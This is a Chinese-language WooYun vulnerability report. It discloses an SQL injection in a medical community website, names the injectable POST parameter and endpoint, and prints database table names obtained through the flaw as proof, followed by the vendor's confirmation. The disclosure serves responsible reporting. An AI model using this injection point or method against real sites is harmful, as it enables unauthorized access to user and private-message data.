漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0158083
漏洞标题:爱爱医医学网存在sql注入
相关厂商:爱爱医医学网
漏洞作者: んi_Stefen
提交时间:2015-12-04 12:01
修复时间:2016-01-18 15:20
公开时间:2016-01-18 15:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开
简要描述:
爱爱医医学网存在sql注入
详细说明:
http://user.iiyi.com:80 随意注册一个账号,登录上挖到sql 注入点url:user.iiyi.com/center/friend/get_relation (post提交参数)fids=*
漏洞证明:
数据库表
case |
| advertise |
| advertise_static |
| app_access_detail |
| app_access_detail_2015_D |
| app_access_uuid |
| app_activety |
| app_counts |
| app_coupon |
| app_dbversion |
| app_login_faild |
| applica_content |
| applica_dbversion |
| applica_downdetial |
| applica_perdownload |
| applica_sort |
| band_records |
| base_area |
| base_hospital |
| bbs_sphinx |
| beans_order |
| case_admin |
| case_collection |
| case_comment |
| case_comment_support |
| case_icons |
| case_icons_log |
| case_images |
| case_myreply |
| case_noallow |
| company |
| dayly_news |
| disease_tags |
| disease_tags_bingli |
| disease_tags_case |
| disease_tags_collection |
| disease_tags_guide |
| disease_tags_look |
| disease_tags_news |
| disease_tags_posts |
| disease_tags_question |
| disease_tags_sous |
| disease_tags_topic |
| disease_tags_types |
| drug_action |
| drug_comp |
| drug_to_action |
| dynamic_0 |
| dynamic_aboutme_0 |
| dynamic_aboutme_1 |
| dynamic_aboutme_2 |
| dynamic_aboutme_3 |
| dynamic_aboutme_4 |
| dynamic_aboutme_5 |
| dynamic_aboutme_6 |
| dynamic_aboutme_7 |
| dynamic_aboutme_8 |
| dynamic_aboutme_9 |
| dynamic_autoid |
| dynamic_collection |
| dynamic_comment_0 |
| dynamic_friends_0 |
| dynamic_friends_1 |
| dynamic_friends_2 |
| dynamic_friends_3 |
| dynamic_friends_4 |
| dynamic_friends_5 |
| dynamic_friends_6 |
| dynamic_friends_7 |
| dynamic_friends_8 |
| dynamic_friends_9 |
| dynamic_images |
| dynamic_mine_0 |
| dynamic_mine_1 |
| dynamic_mine_2 |
| dynamic_mine_3 |
| dynamic_mine_4 |
| dynamic_mine_5 |
| dynamic_mine_6 |
| dynamic_mine_7 |
| dynamic_mine_8 |
| dynamic_mine_9 |
| dynamic_square |
| dynamic_tiny |
| euids |
| feedback |
| flash |
| flash_collection |
| flash_comment |
| flash_comment_support |
| flash_images |
| flash_sort |
| guide |
| guide_collection |
| home_access |
| hotmed |
| it_collect |
| it_comment |
| it_images |
| it_topic |
| literature |
| literature_sort |
| member_base |
| member_bbs_signin |
| member_beans_detial |
| member_beans_tran_log |
| member_black |
| member_certification |
| member_certification_ask |
| member_groups |
| member_image |
| member_invite_mobile |
| member_invitecode |
| member_perfection |
| member_relation |
| member_signin_detail |
| pms_detail |
| pms_relation |
| posts |
| site_var |
| sphinx_counter |
| sysnotice |
| sysnotice_mine_0 |
| sysnotice_mine_1 |
| sysnotice_mine_2 |
| sysnotice_mine_3 |
| sysnotice_mine_4 |
| sysnotice_mine_5 |
| sysnotice_mine_6 |
| sysnotice_mine_7 |
| sysnotice_mine_8 |
| sysnotice_mine_9 |
| thread_support |
| threads |
| topic |
| topic_collection |
| topic_comment |
| topic_comment_support |
| topic_images |
| topic_myreply |
| tupu |
| tupu_class |
| tupu_class_copy |
| tupu_class_type |
| tupu_copy |
| tupu_images |
+--------------------------+
挺多信息,不一一爬了。
修复方案:
过滤
版权声明:转载请注明来源 んi_Stefen@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-12-04 15:17
厂商回复:
感谢,已经确认,安排人处理
最新状态:
暂无